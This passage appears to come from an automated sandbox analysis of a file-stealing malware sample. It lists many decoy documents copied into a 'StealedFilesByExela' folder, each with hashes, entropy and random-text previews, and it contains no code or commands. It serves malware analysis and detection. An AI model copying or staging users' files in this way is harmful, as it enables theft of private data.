                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LTKMYBSEYZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LTKMYBSEYZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NIKHQAIQAU.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NWTVCDUMOB.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\ONBQCLYSPU.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\ONBQCLYSPU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\UMMBDNEQBN.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\UMMBDNEQBN.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
